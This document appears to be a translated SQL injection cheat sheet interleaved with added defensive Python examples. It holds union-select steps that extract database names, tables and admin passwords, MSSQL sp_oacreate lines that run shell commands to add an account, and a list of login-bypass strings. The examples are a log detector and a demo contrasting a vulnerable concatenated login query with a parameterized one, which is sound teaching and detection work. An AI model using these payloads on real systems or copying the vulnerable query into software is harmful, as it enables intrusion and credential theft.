Collected injection tricks
1) Determine the version: news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
2) Database name: info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*
3) Table name (the hexadecimal value is the result of the previous step):
info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1
4) tg_adminuser hex-encoded is 0x74675F61646D696E75736572; look up the column names of that table one at a time, as in Figures 4 and 5:
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1
5) With the database, table name and columns all known, querying the password is simple, as in Figure 6:
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
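Every request in the enumeration sequence above shares the same shape: a negative id, `union select` padded out to the right column count, inline `/**/` comments in place of whitespace, `information_schema` lookups, and hex literals standing in for quoted strings. The following detector, an added example that is not part of the original page, reads constructed Apache-style access-log lines (the URIs mirror the requests listed above), normalizes each URI (percent-decoding, comment stripping, whitespace collapsing) so the obfuscation no longer hides the keywords, flags the indicators, and decodes any hex literals back to text so an analyst can see which schema or table was being targeted.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the original page). Lines 2-4 carry
# enumeration requests; line 5 is a benign search that merely contains "union".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news_info.php?wid=12 HTTP/1.1" 200 5123
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/* HTTP/1.1" 200 4871
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1 HTTP/1.1" 200 4902
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news_info.php?wid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1,username,3,4,password,6 HTTP/1.1" 200 4700
10.0.0.3 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 3311
"""

# Common log format: ip ident user [timestamp] "METHOD uri PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the normalized URI, so "union/**/select",
# "union%20select" and "union select" all reduce to the same string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\."),
    "db_fingerprint": re.compile(r"\b(user|version|database)\(\)"),
}


def normalize(uri):
    """Undo the obfuscation layers so keyword matching sees plain SQL."""
    s = unquote(unquote(uri)).lower()      # two passes handle double encoding
    s = re.sub(r"/\*.*?\*/", " ", s)       # inline comments act as whitespace
    s = re.sub(r"\s+", " ", s)             # collapse runs of whitespace
    return s


def decode_hex_literals(s):
    """Turn 0x-prefixed literals back into text (0x77656262617365 -> webbase)."""
    decoded = []
    for h in re.findall(r"0x([0-9a-f]+)\b", s):
        if len(h) % 2 == 0:
            decoded.append(bytes.fromhex(h).decode("ascii", "replace"))
    return decoded


def analyze_log(log_text):
    """Return one finding per request that trips at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        norm = normalize(m.group("uri"))
        hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "uri": m.group("uri"),
                "indicators": hits,
                "decoded_hex": decode_hex_literals(norm),
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ip"], f["indicators"], f["decoded_hex"], f["uri"][:60])
```

The normalization step is the part that matters: a rule that looks for the literal string `union select` never fires on the requests above, because the author replaced every space with `/**/`. Decoding the hex literals is purely for triage; it lets the analyst read `webbase` and `tg_adminuser` directly from the alert instead of converting by hand.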
DECLARE @S int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],NULL,[cmd.exe /c net user guest testa!@#$] --
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\command.com /c net user'--
http://www.wjs168.com
Summary of methods for bypassing login verification to reach the admin backend:
1) ' or ''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6) or 1=1--
7) or 'a='a
8) " or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
12) 'or''='
13) 人气%' and 1=1 and '%'='
14) 1'or'1'='1
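All of the strings above work the same way: they close the quoted value the application built around user input, append an always-true condition, and comment out or re-balance whatever SQL follows. The example below, added here and not part of the original page, puts a string-concatenated login check next to a parameterized one over a constructed SQLite table and runs several of the listed payloads through both. It also shows why the list contains so many variants: a payload only succeeds when its quoting and parenthesization match the query it lands in, and a mismatch produces a SQL error rather than a bypass (which is itself worth alerting on).

```python
import sqlite3

# Constructed demo table (not from the original page): a single admin account.
ADMIN_USER = "admin"
ADMIN_PASS = "correct horse battery staple"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tg_adminuser (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tg_adminuser VALUES (?, ?)", (ADMIN_USER, ADMIN_PASS))
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: the submitted values become part of the SQL text,
    # so quotes, OR clauses and "--" comments in them are parsed as SQL.
    sql = ("SELECT username FROM tg_adminuser WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders: values travel separately from the statement, so a quote
    # inside them is just a character and can never change the query shape.
    sql = "SELECT username FROM tg_adminuser WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# A selection of the payloads listed above, submitted as the password field.
BYPASS_PAYLOADS = [
    "' or ''='",        # closes the literal, appends ''='' which is always true
    "' or 1=1--",       # always-true condition, trailing quote commented out
    "1'or'1'='1",       # works without spaces
    "' or 'a'='a--",    # the trailing quote lands inside 'a--', so it fails here
    "') or ('a'='a",    # needs a parenthesized WHERE; here it is a syntax error
]


def compare(conn, username="x"):
    """Map each payload to (vulnerable_result, parameterized_result)."""
    results = {}
    for payload in BYPASS_PAYLOADS:
        try:
            vulnerable = login_vulnerable(conn, username, payload)
        except sqlite3.Error:
            vulnerable = "error"
        results[payload] = (vulnerable, login_parameterized(conn, username, payload))
    return results


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in compare(db).items():
        print(f"{payload!r:20} vulnerable={vuln!s:6} parameterized={safe}")
```

The parameterized version authenticates the real credentials and rejects every payload, because the database never sees the payload as SQL. The vulnerable version shows the three outcomes a defender should expect from this class of input: a successful bypass, a silent miss when the quoting does not line up, and a parser error when the parenthesization does not; a burst of such errors on a login endpoint is a useful detection signal even when no bypass succeeds.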